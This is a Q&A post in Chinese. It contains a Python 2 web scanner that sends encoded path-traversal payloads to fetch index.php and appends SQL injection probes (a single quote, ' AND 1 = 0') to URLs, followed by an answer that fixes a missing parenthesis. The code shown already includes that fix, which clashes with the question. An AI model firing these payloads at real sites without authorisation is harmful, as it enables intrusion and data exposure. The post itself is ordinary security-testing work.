我正在尝试编写一个简单的 Web 应用程序。这个应用程序是一个扫描器。这是我的代码:
import os, sys, urllib2, re, urlparse
# Shared scan state, filled in by the functions in this file:
#   l   - links appended by get_links()
#   n_l - entries from l with a trailing single quote, built by sql_url()
#   b_l - entries from l with ' AND 1 = 0' appended, built by sql_url()
# Tuple unpacking gives three distinct lists (no aliasing between them).
l, n_l, b_l = [], [], []
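def url(url):
    """Return ``url`` with a scheme, defaulting to ``http://``.

    A value that already starts with ``http://`` or ``https://`` (compared
    case-insensitively) is returned unchanged. The original only recognised
    ``http://``, so an ``https://`` target was turned into the invalid
    ``http://https://...``.

    The parameter keeps its original name even though it shadows the
    function inside the body; callers only ever pass it positionally.
    """
    if url.lower().startswith(('http://', 'https://')):
        return url
    return 'http://' + url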
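def get_links(url):
    """Fetch ``url`` and append the links found on it to the global ``l``.

    Every ``href`` value matched by the regex is resolved against ``url``
    with ``urlparse.urljoin``, which already returns absolute links
    unchanged, so no separate ``http://`` test is needed.

    Only links on the same host as ``url`` are kept. The other functions in
    this file send modified requests to everything in ``l``; keeping
    off-site links would extend the scan to hosts the operator never named.
    Links without a host part (``mailto:``, ``javascript:``) are dropped by
    the same comparison.

    Any error is printed and the function returns with whatever was
    collected up to that point.
    """
    try:
        res = urllib2.urlopen(url)
        try:
            print 'Loading ',url
            print 'Status ',res.getcode()
            string = res.read()
        finally:
            # Release the connection even if reading the body fails.
            res.close()
        scan_host = urlparse.urlparse(url).netloc.lower()
        for link in re.findall(r'href=[\'"]?([^\'" >]+)', string):
            link = urlparse.urljoin(url, link)
            if urlparse.urlparse(link).netloc.lower() != scan_host:
                continue
            l.append(link)
    except Exception as e:
        print str(e)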
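def transvers(app):
    """Request each parameterised link in ``l`` with its value replaced by ``app``.

    For every link that contains both ``?`` and ``=``, everything after the
    first ``=`` is dropped and ``app`` is appended. The response body is
    appended to a local file named ``index.php``.

    An error on one request is printed and the loop moves on to the next link.
    """
    for rl in l:
        # The original condition `'?' and '=' in rl` only tested for '=':
        # a non-empty string literal is always true.
        if '?' not in rl or '=' not in rl:
            continue
        rl = rl.split('=')[0] + '=' + app
        print 'Download Index.php from %s'%rl
        try:
            fi_le = urllib2.urlopen(rl)
            try:
                body = fi_le.read()
            finally:
                fi_le.close()
            # NOTE(review): the body is saved whether or not it looks like
            # PHP source, so a non-empty index.php is not by itself a finding.
            # The content is also untrusted: if this script runs from a
            # directory served by a PHP-enabled web server, the saved file
            # would be executable there. A dedicated output directory and a
            # non-executable extension avoid that.
            with open('index.php', 'a') as output:
                output.write(body)
        except Exception as exceptions:
            print str(exceptions)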
def sql_url():
    """Build the two probe lists from the links collected in ``l``.

    A link qualifies when it contains ``=`` and its last character is one of
    the ten ASCII digits. For each qualifying link, the link plus a single
    quote is appended to ``n_l`` and the link plus ``' AND 1 = 0'`` is
    appended to ``b_l``.
    """
    digits = tuple('0123456789')
    for candidate in l:
        if '=' not in candidate or not candidate.endswith(digits):
            continue
        n_l.append(candidate + "'")
        b_l.append(candidate + ' AND 1 = 0')
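def sql_test():
    """Request every URL in ``n_l`` and report whether the reply contains a
    MySQL syntax-error message.

    The check is a substring match on one MySQL error text. "not found"
    therefore only means that this text did not appear; it says nothing about
    other database engines or about applications that hide their errors, and
    a page that merely displays the phrase is reported as a hit.

    ``urllib2.urlopen`` raises on HTTP error statuses and on network
    failures. The original let that exception end the whole run; it is now
    printed and the loop continues, matching get_links() and transvers().
    """
    for inj in n_l:
        print 'Trying SQL injection in %s'%inj
        try:
            res = urllib2.urlopen(inj)
            try:
                responz = res.read()
            finally:
                res.close()
        except Exception as e:
            print str(e)
            continue
        if 'error in your SQL syntax' in responz:
            print 'SQL BUG FOUND IN %s'%inj
        else:
            print 'SQL bug not found in %s'%inj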
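def blind_injection():
    """Compare each URL in ``b_l`` with the same URL minus ``' AND 1 = 0'``.

    Both variants are fetched and their bodies compared for exact equality;
    a difference is reported as a finding.

    NOTE(review): exact comparison flags any page whose content changes
    between two requests (timestamps, per-request tokens, rotating content),
    so a "FOUND" line needs manual confirmation before it is treated as a
    vulnerability.
    """
    for blnd in b_l:
        base = blnd.split(' AND 1 = 0')[0]
        try:
            print 'Opening ......... %s'%blnd
            rspn = urllib2.urlopen(blnd).read()
            print 'Opening ........ %s'%base
            # Fix: the original line was missing the parenthesis that closes
            # urlopen(...), which made the following print statement a
            # SyntaxError.
            rsp = urllib2.urlopen(base).read()
        except Exception as e:
            # Same best-effort handling as get_links() and transvers():
            # report the failure and move on to the next URL.
            print str(e)
            continue
        print 'Comparing output'
        if rspn == rsp:
            print 'Blind SQL injection bug not found in %s'%blnd
        else:
            print 'BLIND SQL IJECTION BUG FOUND IN %s'%blnd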
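def main():
    """Run the scan against the URL given as the first command-line argument.

    Order of work: normalise the URL, collect links from that page, request
    each parameterised link once per entry in ``col``, then build and run the
    two SQL checks. Prints a usage line and exits with status 1 when no URL
    is given (the original raised IndexError).
    """
    if len(sys.argv) < 2:
        print 'Usage: %s <url>'%sys.argv[0]
        sys.exit(1)
    ins = url(sys.argv[1])
    get_links(ins)
    # Values substituted for the query parameter by transvers().
    # NOTE(review): the second entry ends in 'index,php' (comma) unlike the
    # others; reproduced as written, confirm whether that is intended.
    col = [
        '../index.php',
        '%2e%2e%2findex,php',
        '%2e%2e/index.php',
        '..%2findex.php',
        '%2e%2e%5cindex.php',
        '%2e%2e\index.php',
        '..%5cindex.php',
        '%252e%252e%255cindex.php',
        '..%255cindex.php',
        '..%c0%afindex.php',
        '..%c1%9cindex.php',
    ]
    for h in col:
        transvers(h)
    sql_url()
    sql_test()
    blind_injection()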
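# Run the scan only when this file is executed as a script, so that importing
# it (for example to reuse url()) does not start sending requests.
if __name__ == '__main__':
    main()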
除了 blind_injection() 函数外,其他一切都正常。该函数会导致如下错误:
File "dt.py", line 57
print 'Opening ........ %s'%blnd.split(' AND 1 = 0')[0]
^
SyntaxError: invalid syntax
如何解决此错误?
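这是括号问题:报错行的上一行(`rsp = urllib2.urlopen(...` 那一行)在 `[0]` 之后缺少一个右括号。由于括号没有闭合,解释器会继续读到下一行的 print 语句才报错,所以真正的原因在上一行,而不是 print 语句本身。应该是:
rsp = urllib2.urlopen(blnd.split(' AND 1 = 0')[0]).read()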